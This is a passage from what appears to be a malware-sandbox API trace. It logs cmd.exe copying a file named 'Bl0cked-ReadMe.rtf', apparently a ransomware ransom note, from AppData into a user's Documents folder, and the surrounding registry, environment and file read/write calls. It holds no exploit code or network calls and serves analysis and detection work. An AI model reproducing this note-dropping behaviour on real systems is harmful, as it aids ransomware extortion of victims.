lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x0, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegCloseKey (hKey=0x40) returned 0x0 [0130.606] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.606] srand (_Seed=0x5b886365) [0130.606] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0130.606] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0130.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.606] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.606] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.607] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.607] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.607] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.607] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.607] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.607] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.607] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.607] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.607] GetEnvironmentStringsW () returned 0x2f22d8* [0130.607] FreeEnvironmentStringsW (penv=0x2f22d8) returned 1 [0130.607] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.607] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.607] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.607] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.607] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.607] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.607] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f620 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.607] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f620, lpFilePart=0x22f61c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f61c*="Desktop") returned 0x18 [0130.607] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.607] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.607] FindClose (in: hFindFile=0x2f0018 | out: hFindFile=0x2f0018) returned 1 [0130.608] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.608] FindClose (in: hFindFile=0x2f0018 | out: hFindFile=0x2f0018) returned 1 [0130.608] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.608] FindClose (in: hFindFile=0x2f0018 | out: hFindFile=0x2f0018) returned 1 [0130.608] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.608] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.608] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.608] GetEnvironmentStringsW () returned 0x2f2af8* [0130.608] FreeEnvironmentStringsW (penv=0x2f2af8) returned 1 [0130.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.609] GetConsoleOutputCP () returned 0x1b5 [0130.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.609] GetUserDefaultLCID () returned 0x409 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f760, cchData=128 | out: lpLCData="0") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f760, cchData=128 | out: lpLCData="0") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f760, cchData=128 | out: lpLCData="1") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.610] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.610] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.610] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.610] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.611] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.611] _wcsicmp (_String1="type", _String2=")") returned 75 [0130.611] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0130.611] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0130.611] _wcsicmp (_String1="IF", _String2="type") returned -11 [0130.611] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0130.611] _wcsicmp (_String1="REM", _String2="type") returned -2 [0130.611] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0130.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] GetFileType (hFile=0x7) returned 0x2 [0130.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.616] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f658 | out: lpMode=0x22f658) returned 1 [0130.616] _dup (_FileHandle=1) returned 3 [0130.616] _close (_FileHandle=1) returned 0 [0130.616] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0130.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f628, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0130.618] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0130.618] GetConsoleTitleW (in: lpConsoleTitle=0x22f458, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.618] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0130.618] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0130.618] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0130.618] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0130.618] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.619] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22efbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22efbc) returned 0x2e0e78 [0130.619] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0130.619] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0130.619] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0130.619] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22dec8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0130.619] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] GetFileType (hFile=0x54) returned 0x1 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22df20 | out: lpFileSizeHigh=0x22df20*=0x0) returned 0x1632 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] GetFileType (hFile=0x4c) returned 0x1 [0130.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] GetFileType (hFile=0x4c) returned 0x1 [0130.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.622] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.623] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.624] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 